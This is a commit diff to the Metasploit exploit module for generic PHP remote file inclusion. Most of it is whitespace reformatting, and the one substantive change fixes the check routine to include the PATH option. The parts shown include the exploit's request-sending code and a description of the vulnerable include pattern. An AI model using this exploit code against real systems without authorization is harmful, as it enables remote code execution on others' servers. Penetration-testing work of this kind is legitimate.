php_include - fix check

Author: g0tmi1k

modules/exploits/unix/webapp/php_include.rb

@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+#	 http://metasploit.com/
 ##
 
 require 'msf/core'
@@ -17,20 +17,20 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'		 => 'PHP Remote File Include Generic Code Execution',
-			'Description'   => %q{
+			'Description'	 => %q{
 					This module can be used to exploit any generic PHP file include vulnerability,
 				where the application includes code like the following:
 
 				<?php include($_GET['path']); ?>
 			},
 			'Author'		 => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
-			'License'	   => MSF_LICENSE,
+			'License'		 => MSF_LICENSE,
 			#'References'	=> [ ],
 			'Privileged'	 => false,
-			'Payload'	   =>
+			'Payload'		 =>
 				{
 					'DisableNops' => true,
-					'Compat'	  =>
+					'Compat'		=>
 						{
 							'ConnectionType' => 'find',
 						},
@@ -45,7 +45,7 @@ def initialize(info = {})
 			'DisclosureDate' => 'Dec 17 2006',
 			'Platform'	 => 'php',
 			'Arch'		 => ARCH_PHP,
-			'Targets'	   => [[ 'Automatic', { }]],
+			'Targets'		 => [[ 'Automatic', { }]],
 			'DefaultTarget' => 0))
 
 		register_options([
@@ -59,19 +59,25 @@ def initialize(info = {})
 			], self.class)
 	end
 
-	def check
-		uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""
-		if(uri and ! uri.empty?)
-			uri.gsub!(/\?.*/, "")
-			print_status("Checking uri #{uri}")
-			response = send_request_raw({ 'uri' => uri})
-			return Exploit::CheckCode::Detected if response.code == 200
-			print_error("Server responded with #{response.code}")
-			return Exploit::CheckCode::Safe
-		else
-			return Exploit::CheckCode::Unknown
+		def check
+				uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""
+
+				tpath = normalize_uri(datastore['PATH'])
+				if tpath[-1,1] == '/'
+						tpath = tpath.chop
+				end
+
+				if(uri and ! uri.empty?)
+						uri.gsub!(/\?.*/, "")
+						print_status("Checking uri #{rhost+tpath+uri}")
+						response = send_request_raw({ 'uri' => tpath+uri})
+						return Exploit::CheckCode::Detected if response.code == 200
+						print_error("Server responded with #{response.code}")
+						return Exploit::CheckCode::Safe
+				else
+						return Exploit::CheckCode::Unknown
+				end
 		end
-	end
 
 	def datastore_headers
 		headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
@@ -136,18 +142,18 @@ def php_exploit
 				if http_method == "GET"
 					response = send_request_raw( {
 						'global' => true,
-						'uri'   => tpath+uri,
+						'uri'	 => tpath+uri,
 						'headers' => datastore_headers,
 					}, timeout)
 				elsif http_method == "POST"
 					response = send_request_raw(
 						{
-							'global'  => true,
+							'global'	=> true,
 							'uri'	=> tpath+uri,
-							'method'  => http_method,
-							'data'  => postdata,
+							'method'	=> http_method,
+							'data'	=> postdata,
 							'headers' => datastore_headers.merge({
-								'Content-Type'   => 'application/x-www-form-urlencoded',
+								'Content-Type'	 => 'application/x-www-form-urlencoded',
 								'Content-Length' => postdata.length
 							})
 						}, timeout)